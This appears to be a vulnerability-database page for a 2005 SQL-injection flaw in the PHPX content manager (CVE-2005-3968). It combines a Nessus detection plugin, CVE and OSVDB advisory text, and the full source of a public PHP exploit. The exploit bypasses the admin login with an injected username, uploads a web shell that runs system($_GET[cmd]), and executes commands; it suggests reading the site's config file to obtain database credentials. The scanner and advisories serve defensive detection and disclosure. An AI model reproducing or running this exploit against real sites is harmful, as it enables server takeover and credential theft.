ID PHPX_USERNAME_SQL_INJECTION.NASL Type nessus Reporter This script is Copyright (C) 2005-2018 Tenable Network Security, Inc. Modified 2021-01-02T00:00:00
Description
The remote host is running PHPX, a content management system written
in PHP.
The installed version of PHPX does not validate input to the
'username' parameter of the 'admin/index.php' script before using it
in a database query. Provided PHP's 'magic_quotes_gpc' setting is
off, an attacker can leverage this issue to manipulate SQL queries to,
for example, bypass authentication and gain administrative access to
the affected application.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description) {
script_id(20251);
script_version("1.23");
script_cve_id("CVE-2005-3968");
script_bugtraq_id(15680);
script_name(english:"PHPX admin/index.php username Parameter SQL Injection");
script_summary(english:"Checks for username parameter SQL injection vulnerability in PHPX");
script_set_attribute(attribute:"synopsis", value:
"The remote web server has a PHP application that is affected by a SQL
injection flaw." );
script_set_attribute(attribute:"description", value:
"The remote host is running PHPX, a content management system written
in PHP.
The installed version of PHPX does not validate input to the
'username' parameter of the 'admin/index.php' script before using it
in a database query. Provided PHP's 'magic_quotes_gpc' setting is
off, an attacker can leverage this issue to manipulate SQL queries to,
for example, bypass authentication and gain administrative access to
the affected application." );
script_set_attribute(attribute:"see_also", value:"https://exchange.xforce.ibmcloud.com/vulnerabilities/23459");
script_set_attribute(attribute:"solution", value:
"Enable PHP's 'magic_quotes_gpc' setting." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value: "2005/12/02");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/11/30");
script_cvs_date("Date: 2018/07/24 18:56:11");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:phpx:phpx");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/PHP");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);
# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/phpx", cgi_dirs()));
else dirs = make_list(cgi_dirs());
foreach dir (dirs) {
# Make sure the affected script exists.
r = http_send_recv3(method:"GET", item:string(dir, "/admin/login.php"), port:port);
if (isnull(r)) exit(0);
res = r[2];
# If it does...
if ("form method=post action=index.php name=f" >< res) {
# Try to exploit the flaw to bypass authentication.
postdata = string(
"username='or user_id=2--&",
"password=&",
"login=yes"
);
r = http_send_recv3(method: "POST", item: dir+"/admin/index.php", port: port,
content_type:"application/x-www-form-urlencoded", data: postdata);
if (isnull(r)) exit(0);
res = strcat(r[0], r[1], '\r\n', r[2]);
# There's a problem if we can log in.
if ("href=index.php?action=logout>Logout</a>" >< res) {
security_hole(port);
set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
exit(0);
}
}
}
{"id": "PHPX_USERNAME_SQL_INJECTION.NASL", "bulletinFamily": "scanner", "title": "PHPX admin/index.php username Parameter SQL Injection", "description": "The remote host is running PHPX, a content management system written\nin PHP. \n\nThe installed version of PHPX does not validate input to the\n'username' parameter of the 'admin/index.php' script before using it\nin a database query. Provided PHP's 'magic_quotes_gpc' setting is\noff, an attacker can leverage this issue to manipulate SQL queries to,\nfor example, bypass authentication and gain administrative access to\nthe affected application.", "published": "2005-12-02T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/20251", "reporter": "This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/23459"], "cvelist": ["CVE-2005-3968"], "type": "nessus", "lastseen": "2021-01-01T04:55:01", "edition": 25, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3968"]}, {"type": "osvdb", "idList": ["OSVDB:21384"]}, {"type": "exploitdb", "idList": ["EDB-ID:26697"]}], "modified": "2021-01-01T04:55:01", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-01-01T04:55:01", "rev": 2}, "vulnersScore": 6.7}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(20251);\n script_version(\"1.23\");\n\n script_cve_id(\"CVE-2005-3968\");\n script_bugtraq_id(15680);\n\n script_name(english:\"PHPX admin/index.php username Parameter SQL Injection\");\n script_summary(english:\"Checks for username parameter SQL injection vulnerability in PHPX\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server has a PHP application that is affected by a SQL\ninjection flaw.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running PHPX, a content management system written\nin PHP. \n\nThe installed version of PHPX does not validate input to the\n'username' parameter of the 'admin/index.php' script before using it\nin a database query. Provided PHP's 'magic_quotes_gpc' setting is\noff, an attacker can leverage this issue to manipulate SQL queries to,\nfor example, bypass authentication and gain administrative access to\nthe affected application.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://exchange.xforce.ibmcloud.com/vulnerabilities/23459\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable PHP's 'magic_quotes_gpc' setting.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/12/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/11/30\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpx:phpx\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80, embedded: 0);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Loop through directories.\nif (thorough_tests) dirs = list_uniq(make_list(\"/phpx\", cgi_dirs()));\nelse dirs = make_list(cgi_dirs());\n\nforeach dir (dirs) {\n # Make sure the affected script exists.\n r = http_send_recv3(method:\"GET\", item:string(dir, \"/admin/login.php\"), port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If it does...\n if (\"form method=post action=index.php name=f\" >< res) {\n # Try to exploit the flaw to bypass authentication.\n postdata = string(\n \"username='or user_id=2--&\",\n \"password=&\",\n \"login=yes\"\n );\n r = http_send_recv3(method: \"POST\", item: dir+\"/admin/index.php\", port: port, \n content_type:\"application/x-www-form-urlencoded\", data: postdata);\n if (isnull(r)) exit(0);\n res = strcat(r[0], r[1], '\\r\\n', r[2]);\n\n # There's a problem if we can log in.\n if (\"href=index.php?action=logout>Logout</a>\" >< res) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "20251", "cpe": ["cpe:/a:phpx:phpx"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:34:57", "description": "SQL injection vulnerability in auth.inc.php in PHPX 3.5.9 and earlier allows remote attackers to execute arbitrary SQL commands, bypass authentication, and upload arbitrary PHP code via the username parameter.", "edition": 3, "cvss3": {}, "published": "2005-12-03T19:03:00", "title": "CVE-2005-3968", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3968"], "modified": "2018-10-19T15:39:00", "cpe": ["cpe:/a:phpx:phpx:3.5.4", "cpe:/a:phpx:phpx:3.5.2", "cpe:/a:phpx:phpx:3.5.3", "cpe:/a:phpx:phpx:3.5.1", "cpe:/a:phpx:phpx:3.5.7", "cpe:/a:phpx:phpx:3.5.6", "cpe:/a:phpx:phpx:3.5", "cpe:/a:phpx:phpx:3.5.9", "cpe:/a:phpx:phpx:3.5.8", "cpe:/a:phpx:phpx:3.5.5"], "id": "CVE-2005-3968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3968", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpx:phpx:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.4:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3968"], "edition": 1, "description": "## Vulnerability Description\nPHPX contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the admin login script calling auth.inc.php which does not properly sanitize user-supplied input to the 'username' field. This may allow an attacker to bypass the admin login check and inject or manipulate SQL queries in the backend database.\n## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Solution Description\nUpgrade to version 3.5.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHPX contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the admin login script calling auth.inc.php which does not properly sanitize user-supplied input to the 'username' field. This may allow an attacker to bypass the admin login check and inject or manipulate SQL queries in the backend database.\n## References:\nVendor URL: http://www.phpx.org/\nVendor Specific Solution URL: http://www.phpx.org/news.php?news_id=139\nSecurity Tracker: 1015300\n[Secunia Advisory ID:17858](https://secuniaresearch.flexerasoftware.com/advisories/17858/)\nOther Advisory URL: http://rgod.altervista.org/phpx_359_xpl.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0384.html\nFrSIRT Advisory: ADV-2005-2696\n[CVE-2005-3968](https://vulners.com/cve/CVE-2005-3968)\nBugtraq ID: 15680\n", "modified": "2005-11-30T00:00:00", "published": "2005-11-30T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:21384", "id": "OSVDB:21384", "title": "PHPX auth.inc.php username Field SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T04:10:56", "description": "PHPX 3.5.x Admin Login.PHP SQL Injection Vulnerability. CVE-2005-3968. Webapps exploit for php platform", "published": "2005-11-30T00:00:00", "type": "exploitdb", "title": "PHPX 3.5.x Admin Login.PHP SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3968"], "modified": "2005-11-30T00:00:00", "id": "EDB-ID:26697", "href": "https://www.exploit-db.com/exploits/26697/", "sourceData": "source: http://www.securityfocus.com/bid/15680/info\r\n\r\nPHPX is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.\r\n\r\nSuccessful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. \r\n\r\n<?php\r\n# 19.17 28/09/2005 18.15 30/11/2005 #\r\n# #\r\n# -- PhpX_359_xpl.php #\r\n# #\r\n# PhpX <=3.5.9 SQL injection->login bypass->remote commands xctn exploit #\r\n# by rgod #\r\n# site: http://rgod.altervista.org #\r\n# #\r\n# usage: launch this script from Apache, fill requested fields, then go... #\r\n# #\r\n# Sun-Tzu: \"The onrush of a conquering force is like the bursting of pent-up #\r\n# waters into a chasm a thousand fathoms deep\" #\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\", 2);\r\nob_implicit_flush (1);\r\n\r\necho'<html><head><title>PhpX <=3.5.9 SQL injection/remote commands xctn exploit\r\n</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">\r\n<style type=\"text/css\"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:\r\n#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img\r\n{background-color: #FFFFFF !important} input {background-color: #303030\r\n!important} option { background-color: #303030 !important} textarea\r\n{background-color: #303030 !important} input {color: #1CB081 !important} option\r\n{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox\r\n{background-color: #303030 !important} select {font-weight: normal; color:\r\n#1CB081; background-color: #303030;} body {font-size: 8pt !important;\r\nbackground-color: #111111; body * {font-size: 8pt !important} h1 {font-size:\r\n0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em\r\n!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em\r\n!important} \th2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em\r\n!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:\r\nnormal !important} *{text-decoration: none !important} a:link,a:active,a:visited\r\n{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;\r\ncolor : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-weight:bold; font-style: italic;}--></style></head><body><p class=\"Stile6\">\r\nPhpX <=3.5.9 SQL injection/remote commands xctn exploit </p><p class=\"Stile6\">a\r\nscript by rgod at <a href=\"http://rgod.altervista.org\"target=\"_blank\">\r\nhttp://rgod.altervista.org</a></p><table width=\"84%\"><tr><td width=\"43%\"> <form\r\nname=\"form1\" method=\"post\" action=\"'.strip_tags($SERVER[PHP_SELF]).'\"><p><input\r\ntype=\"text\" name=\"host\"> <span class=\"Stile5\">* hostname (ex:www.sitename.com)\r\n</span></p> <p><input type=\"text\" name=\"path\"> <span class=\"Stile5\">* path (ex:\r\n/phpx/ or just / ) </span></p><p><input type=\"text\" name=\"command\"> <span\r\nclass=\"Stile5\"> * specify a command \"cat ./../admin/includes/config.inc.php\" to\r\nsee database username & password (against Win: \"type .\\..\\admin\\includes\\config.\r\ninc.php\")</span> </p><p> <input type=\"text\" name=\"port\"> <span class=\"Stile5\">\r\nspecify a port other than 80 ( default value ) </span></p> <p> <input\r\ntype=\"text\" name=\"proxy\"><span class=\"Stile5\"> send exploit through an HTTP\r\nproxy (ip:port)</span></p><p><input type=\"submit\" name=\"Submit\" value=\"go!\"></p>\r\n</form> </td></tr></table></body></html>';\r\n\r\nfunction show($headeri)\r\n{\r\n$ii=0;\r\n$ji=0;\r\n$ki=0;\r\n$ci=0;\r\necho '<table border=\"0\"><tr>';\r\nwhile ($ii <= strlen($headeri)-1)\r\n{\r\n$datai=dechex(ord($headeri[$ii]));\r\nif ($ji==16) {\r\n $ji=0;\r\n $ci++;\r\n echo \"<td> </td>\";\r\n for ($li=0; $li<=15; $li++)\r\n { echo \"<td>\".$headeri[$li+$ki].\"</td>\";\r\n\t\t\t }\r\n $ki=$ki+16;\r\n echo \"</tr><tr>\";\r\n }\r\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\r\n{echo \"<td>\".$datai.\"</td> \";}\r\n$ii++;\r\n$ji++;\r\n}\r\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\r\n { echo \"<td>  </td>\";\r\n }\r\n\r\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\r\n { echo \"<td>\".$headeri[$li].\"</td>\";\r\n\t\t\t }\r\necho \"</tr></table>\";\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction sendpacket() //if you have sockets module loaded, 2x speed! if not,load\r\n\t\t //next function to send packets\r\n{\r\n global $proxy, $host, $port, $packet, $html, $proxy_regex;\r\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\r\n if ($socket < 0) {\r\n echo \"socket_create() failed: reason: \" . socket_strerror($socket) . \"<br>\";\r\n }\r\n\t else\r\n \t\t { $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {echo 'Not a valid prozy...';\r\n die;\r\n }\r\n echo \"OK.<br>\";\r\n echo \"Attempting to connect to \".$host.\" on port \".$port.\"...<br>\";\r\n if ($proxy=='')\r\n\t\t {\r\n\t\t $result = socket_connect($socket, $host, $port);\r\n\t\t }\r\n\t\t else\r\n\t\t {\r\n\r\n\t\t $parts =explode(':',$proxy);\r\n echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\r\n\t\t $result = socket_connect($socket, $parts[0],$parts[1]);\r\n\t\t }\r\n\t\t if ($result < 0) {\r\n echo \"socket_connect() failed.\\r\\nReason: (\".$result.\") \" . socket_strerror($result) . \"<br><br>\";\r\n }\r\n\t else\r\n\t\t {\r\n echo \"OK.<br><br>\";\r\n $html= '';\r\n socket_write($socket, $packet, strlen($packet));\r\n echo \"Reading response:<br>\";\r\n while ($out= socket_read($socket, 2048)) {$html.=$out;}\r\n echo nl2br(htmlentities($html));\r\n echo \"Closing socket...\";\r\n socket_close($socket);\r\n\r\n\t\t\t\t }\r\n }\r\n}\r\nfunction sendpacketii($packet)\r\n{\r\nglobal $proxy, $host, $port, $html, $proxy_regex;\r\nif ($proxy=='')\r\n {$ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) { echo 'No response from '.htmlentities($host);\r\n\t\t\tdie; }\r\n }\r\n else\r\n {\r\n\t $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {echo 'Not a valid prozy...';\r\n die;\r\n }\r\n\t $parts=explode(':',$proxy);\r\n\t echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\r\n\t $ock=fsockopen($parts[0],$parts[1]);\r\n\t if (!$ock) { echo 'No response from proxy...';\r\n\t\t\tdie;\r\n\t\t }\r\n\t }\r\nfputs($ock,$packet);\r\nif ($proxy=='')\r\n {\r\n\r\n $html='';\r\n while (!feof($ock))\r\n {\r\n $html.=fgets($ock);\r\n }\r\n }\r\nelse\r\n {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\r\n {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\nfclose($ock);\r\necho nl2br(htmlentities($html));\r\n}\r\n\r\n\r\n$host=$_POST[host];$path=$_POST[path];\r\n$port=$_POST[port];$command=$_POST[command];\r\n$proxy=$_POST[proxy];\r\n\r\nif (($host<>'') and ($path<>'') and ($command<>''))\r\n{\r\n$port=intval(trim($port));\r\nif ($port=='') {$port=80;}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n$host=str_replace(\"\\r\\n\",\"\",$host);\r\n$path=str_replace(\"\\r\\n\",\"\",$path);\r\n\r\n$SQL=\"'or user_id=2/*\";\r\n$SQL=urlencode($SQL);\r\n\r\n\r\n#STEP 1 -> Login Bypass...\r\n$data=\"username=\".$SQL.\"&password=&login=yes\";\r\n$packet=\"POST \".$p.\"admin/index.php HTTP/1.1\\r\\n\";\r\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\r\n$packet.=\"Referer: http://\".$host.\":\".$port.$path.\"admin/login.php?code=i\\r\\n\";\r\n$packet.=\"Accept-Language: en\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1 \\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Cache-Control: no-cache\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nshow($packet);\r\nsendpacketii($packet);\r\nif (eregi(\"Location: index.php\",$html)) {echo \"Exploit succeeded...<br>\";}\r\n else {die(\"Exploit failed...\");}\r\n$temp=explode(\"Set-Cookie: \",$html);\r\n$temp2=explode(' ',$temp[1]);\r\n$COOKIE=$temp2[0];\r\necho '<br>Your cookie: '.htmlentities($COOKIE);\r\n\r\n#STEP 2 -> Shell upload...\r\n$data='-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"confirm\"\r\n\r\n1\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"file1\"; filename=\"C:\\suntzu.php.menu\"\r\nContent-Type: text/plain\r\n\r\n<?php error_reporting(0);ini_set(\"max_execution_time\",0);system($_GET[cmd]);?>\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"file2\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"file3\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"file4\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"file5\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"more\"\r\n\r\n0\r\n-----------------------------7d5baf306c0--';\r\n\r\n$packet=\"POST \".$p.\"admin/images.php?action=create HTTP/1.1\\r\\n\";\r\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\r\n$packet.=\"Referer: http://\".$host.\":\".$port.$path.\"admin/images.php?action=create\\r\\n\";\r\n$packet.=\"Accept-Language: en\\r\\n\";\r\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------7d5baf306c0\\r\\n\";\r\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\r\n$packet.=\"User-Agent: IncyWincy data gatherer\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Cache-Control: no-cache\\r\\n\";\r\n$packet.=\"Cookie: \".$COOKIE.\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nshow($packet);\r\nsendpacketii($packet);\r\n\r\n#STEP 3 -> Retrieve filename from file list...\r\n$packet=\"GET \".$p.\"admin/images.php HTTP/1.1\\r\\n\";\r\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\r\n$packet.=\"Referer: http://\".$host.\":\".$port.$path.\"admin/images.php?action=create\\r\\n\";\r\n$packet.=\"Accept-Language: en\\r\\n\";\r\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\r\n$packet.=\"User-Agent: Jakarta Commons-HttpClient/3.0-rcx\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Cache-Control: no-cache\\r\\n\";\r\n$packet.=\"Cookie: \".$COOKIE.\"\\r\\n\\r\\n\";\r\nshow($packet);\r\nsendpacketii($packet);\r\n$temp=explode('suntzu.php.menu',$html);\r\n$i=count($temp)-1;\r\n$temp2=explode(\"/files/\",$temp[$i-1]);\r\n$i=count($temp2)-1;\r\n$FILENAME=$temp2[$i].'suntzu.php.menu';\r\necho '<br>File has been renamed as: '.htmlentities($FILENAME);\r\n\r\n#STEP 4 -> Launch commands...\r\n$packet=\"GET \".$p.\"files/\".$FILENAME.\"?cmd=\".urlencode($command).\" HTTP/1.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot-Image/1.0 (+http://www.googlebot.com/bot.html)\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nshow($packet);\r\nsendpacketii($packet);\r\n}\r\nelse\r\n{echo \"Fill * required fields, optionally specify a proxy...\";}\r\n?>\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26697/"}]}
